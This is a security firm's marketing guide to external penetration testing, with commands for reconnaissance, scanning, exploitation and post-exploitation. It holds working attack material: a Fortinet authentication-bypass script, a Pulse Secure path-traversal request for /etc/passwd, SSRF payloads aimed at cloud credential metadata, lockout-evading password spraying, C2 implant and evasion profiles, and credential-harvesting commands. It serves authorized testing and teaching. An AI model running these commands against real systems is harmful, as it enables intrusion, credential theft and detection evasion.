External penetration testing is one of the most critical security assessments an organization can invest in. Unlike internal testing, which assumes a foothold inside the network, external pen testing simulates what a real-world attacker sees when they target your organization from the internet. No prior access, no inside knowledge, just an IP range or a domain name and the goal of getting in.
This guide walks through the full methodology that professional red teams at Redfox Cybersecurity follow when conducting external penetration tests, including the tools, techniques, and real commands used at each phase.
External penetration testing is an authorized, simulated attack against an organization's internet-facing assets. These include web applications, VPN endpoints, mail servers, DNS infrastructure, exposed APIs, and any other service reachable from the public internet.
The objective is to identify vulnerabilities that a threat actor could exploit before they do, and to provide a prioritized, evidence-backed remediation roadmap. This is not a vulnerability scan. A true external pen test involves manual exploitation, chaining of weaknesses, and proof-of-concept access to demonstrate real business risk.
If your organization has never undergone a formal external assessment, you are operating with an incomplete picture of your attack surface. The Redfox Cybersecurity team regularly uncovers critical exposures during initial reconnaissance that organizations had no idea existed.
Reconnaissance is where an external pen test begins and where the most valuable intelligence is gathered. The goal is to map every asset that belongs to the target organization before touching a single port.
Passive recon involves gathering information from publicly available sources without sending a single packet to the target.
WHOIS and ASN enumeration:
whois redfoxsec.com
amass intel -org "Target Organization" -asn 12345
[cta]
Certificate transparency log mining using crt.sh:
curl -s "https://crt.sh/?q=%25.targetdomain.com&output=json" | jq -r '.[].name_value' | sort -u
[cta]
This single command can reveal dozens of subdomains that the target organization may have forgotten about, including staging environments, internal tools exposed publicly, and legacy applications.
Google dork enumeration:
site:targetdomain.com -www
site:targetdomain.com filetype:pdf
site:targetdomain.com inurl:admin
intitle:"index of" site:targetdomain.com[cta]
Email harvesting with theHarvester:
theHarvester -d targetdomain.com -b google,bing,linkedin,certspotter -l 500
[cta]
Once passive recon is complete, testers move to light active enumeration to confirm live assets.
DNS brute-forcing with dnsx and PureDNS:
puredns bruteforce /opt/wordlists/dns/best-dns-wordlist.txt targetdomain.com -r /opt/resolvers/resolvers.txt -w live_subdomains.txt
cat live_subdomains.txt | dnsx -a -cname -resp -o resolved.txt
[cta]
Subdomain permutation with gotator:
gotator -sub live_subdomains.txt -perm /opt/wordlists/permutations.txt -depth 1 -numbers 3 | puredns resolve -r /opt/resolvers/resolvers.txt
[cta]
At this stage, a typical engagement for a mid-sized organization yields between 300 and 1,500 unique subdomains, many of which the security team was unaware of.
With a confirmed list of IP addresses and hostnames, the next phase is mapping open ports and services across the entire external attack surface.
For large IP ranges, speed matters. Redfox Cybersecurity uses a layered approach: fast SYN scanning first, then deep service fingerprinting on confirmed open ports.
Mass port discovery with naabu:
naabu -list targets.txt -top-ports 3000 -o open_ports.txt -rate 2000
[cta]
Targeted Nmap service fingerprinting:
nmap -sV -sC -O -p $(cat open_ports.txt | grep "IP" | cut -d: -f2 | tr '\n' ',') -iL live_ips.txt -oA nmap_results --reason
[cta]
TLS and certificate analysis with tlsx:
cat resolved.txt | tlsx -san -cn -resp -json -o tls_output.json
TLS certificate analysis is frequently overlooked but often exposes internal hostnames, alternative domain names, and certificate mismatches that hint at infrastructure details.
One of the highest-value findings in external pen tests is the discovery of exposed administrative panels, as these represent direct paths to critical systems.
cat live_subdomains.txt | httpx -title -tech-detect -status-code -follow-redirects -mc 200,301,302,403 | grep -iE "admin|login|vpn|portal|dashboard|manage|remote|rdp|ssh"
[cta]
Services commonly found exposed during this phase include Citrix gateways, Pulse Secure VPN, Fortinet SSL-VPN, Jenkins, Grafana, Kubernetes dashboards, and database admin panels.
With the attack surface mapped and services enumerated, the focus shifts to identifying exploitable weaknesses. This is where automated scanning is combined with deep manual analysis.
Full-featured crawling and parameter discovery with katana:
katana -list live_webapps.txt -depth 5 -js-crawl -automatic-form-fill -kf all -o katana_output.txt
[cta]
Nuclei template-based scanning against the discovered surface:
nuclei -list live_webapps.txt -t /opt/nuclei-templates/ -severity medium,high,critical -rl 50 -bulk-size 25 -o nuclei_results.txt -stats
[cta]
Nuclei templates cover thousands of known CVEs, misconfigurations, exposed panels, and default credentials across virtually every web technology stack in use today.
SQL injection fuzzing with sqlmap against discovered parameters:
sqlmap -u "https://target.com/search?q=test" --level=5 --risk=3 --dbs --batch --random-agent --tamper=space2comment,between
[cta]
Not all external exposures are web-based. Exposed services on non-standard ports frequently harbor serious vulnerabilities.
SMB vulnerability checking:
nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-cve-2020-0796,smb2-security-mode -iL smb_hosts.txt
[cta]
SSH audit for weak ciphers and algorithms:
ssh-audit -t 60 -l warn target.com
RDP exposure and BlueKeep detection:
nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020 -iL rdp_hosts.txt
[cta]
A frequently underestimated component of external pen testing is hunting for credentials and secrets leaked in public code repositories. Developers often accidentally commit API keys, passwords, and private certificates.
Automated secret scanning with trufflehog:
trufflehog github --org=targetorganization --token=$GITHUB_TOKEN --json | jq '.SourceMetadata.Data.Github.link,.Raw' > leaked_secrets.txt
[cta]
Gitleaks on a cloned repository:
gitleaks detect --source /path/to/cloned/repo --report-format json --report-path gitleaks_report.json -v
[cta]
During Redfox Cybersecurity engagements, leaked credentials found in public repositories have been the initial access vector on a significant number of assessments, often bypassing every technical control in place at the perimeter.
Exploitation is where identified vulnerabilities are converted into proven access. Every finding must be validated with a working exploit or proof of concept to confirm actual risk, not just theoretical exposure.
VPN appliances are high-value targets because they sit at the perimeter and, if compromised, provide direct network access.
Checking for Fortinet CVE-2022-40684 authentication bypass:
import requests
target = "https://target-fortigate.com"
headers = {
"User-Agent": "Report Runner",
"Forwarded": "for=\"[127.0.0.1]:8888\";by=\"[127.0.0.1]:9999\";host=localhost"
}
response = requests.get(f"{target}/api/v2/cmdb/system/admin/admin", headers=headers, verify=False)
print(response.status_code)
print(response.text)
[cta]
Testing Pulse Secure path traversal (CVE-2019-11510):
curl -sk "https://target-vpn.com/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" | head -20
[cta]
These are examples of publicly documented, patched vulnerabilities. Their presence on production systems indicates a failure in patch management and change control processes.
Server-Side Request Forgery (SSRF) payload to probe internal metadata:
https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
https://target.com/fetch?url=http://[::1]/internal-admin/
https://target.com/proxy?destination=file:///etc/passwd[cta]
JWT token algorithm confusion attack:
# Decode the token, extract the public key, re-sign with 'none' algorithm
python3 jwt_tool.py <TOKEN> -X a
# Test RS256 to HS256 confusion
python3 jwt_tool.py <TOKEN> -pk server_public.pem -X k
[cta]
Subdomain takeover validation with nuclei and manual confirmation:
nuclei -l subdomains.txt -t /opt/nuclei-templates/takeovers/ -o takeover_candidates.txt
# Manually verify DNS CNAME pointing to unclaimed service
dig CNAME vulnerable.targetdomain.com
[cta]
Subdomain takeovers allow an attacker to serve content under a trusted domain, which is frequently leveraged for phishing, session hijacking, or bypassing content security policies. If you want to understand how these attack vectors apply to your external perimeter, explore what Redfox Cybersecurity covers at https://www.redfoxsec.com/services.
When Microsoft 365, OWA, or Azure AD authentication endpoints are exposed, password spraying is a viable and frequently successful attack.
Office 365 password spray with MSOLSpray:
Invoke-MSOLSpray -UserList .\users.txt -Password "Winter2024!" -Verbose[cta]
OWA spraying with ruler:
ruler --domain targetdomain.com spray --users users.txt --passwords passwords.txt --delay 60 --verbose
[cta]
A 60-second delay per attempt keeps the attack below most account lockout thresholds while remaining practical for lists of 500 to 2,000 users.
Responsible post-exploitation proves the business impact of a successful breach without causing disruption to live systems.
Deploying Sliver C2 over HTTPS with domain fronting:
# On the Sliver server
generate --mtls --os linux --arch amd64 --name client_implant --save /tmp/
mtls --lhost 0.0.0.0 --lport 443
# Generated implant communicates over mutual TLS to avoid detection
[cta]
Cobalt Strike malleable C2 profile for traffic blending:
set sleeptime "45000";
set jitter "20";
http-get {
set uri "/cdn/assets/bundle.js";
client {
header "Accept" "application/javascript";
header "Referer" "https://www.google.com/";
}
}
[cta]
Once initial access is established, demonstrating what an attacker could reach is critical for understanding true business impact.
Credential extraction from compromised Linux host:
cat /etc/shadow
find / -name "*.env" 2>/dev/null | xargs grep -iE "password|secret|key|token" 2>/dev/null
find / -name "id_rsa" -o -name "*.pem" 2>/dev/null
[cta]
Identifying accessible cloud resources using harvested credentials:
aws sts get-caller-identity --profile compromised
aws s3 ls --profile compromised
aws secretsmanager list-secrets --profile compromised
[cta]
Demonstrating access to cloud infrastructure, internal databases, or sensitive file stores makes the business risk undeniable and drives remediation urgency in a way that a CVSS score alone never can. This is one of the areas where Redfox Cybersecurity's approach, detailed at redfoxsec.com/services, differs from a standard vulnerability assessment.
A penetration test is only as valuable as the report that follows it. Redfox Cybersecurity delivers reports structured for two audiences: technical teams who need step-by-step reproduction details, and executives who need to understand business risk and investment priorities.
Every finding in a professional report should contain:
Not all vulnerabilities carry equal weight in an external context. Prioritization should reflect exploitability from an unauthenticated external position, the data or systems accessible post-exploitation, and the effort required to remediate.
Critical findings, meaning those with a working unauthenticated exploit against an internet-facing system, should be communicated immediately, often before the report is finalized. This is standard practice at Redfox Cybersecurity and reflects how professional red teams actually operate.
Based on hundreds of external assessments, these are the exposures most frequently overlooked:
If your organization relies on continuous perimeter monitoring rather than point-in-time assessments, the external attack surface management capabilities at https://www.redfoxsec.com/services can fill the gaps between annual engagements.
External penetration testing is not a checkbox exercise. It is a structured, intelligence-driven simulation of the attacks your organization faces every day from threat actors who have the time, motivation, and tooling to find every gap in your perimeter.
The methodology covered in this guide, from passive reconnaissance through exploitation and reporting, reflects the approach taken by professional red teams who treat every engagement as a genuine adversarial simulation. The commands, tools, and techniques shared here represent current practitioner standards, not theoretical frameworks.
The most valuable thing an external pen test provides is certainty: certainty about what is exposed, what can be compromised, and what needs to change. Organizations that invest in rigorous external testing consistently discover that their perimeter is both larger and more vulnerable than their asset inventory suggests.
If your organization is ready to see your external attack surface the way an attacker does, the Redfox Cybersecurity team is ready to help. Start the conversation at https://www.redfoxsec.com/services.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)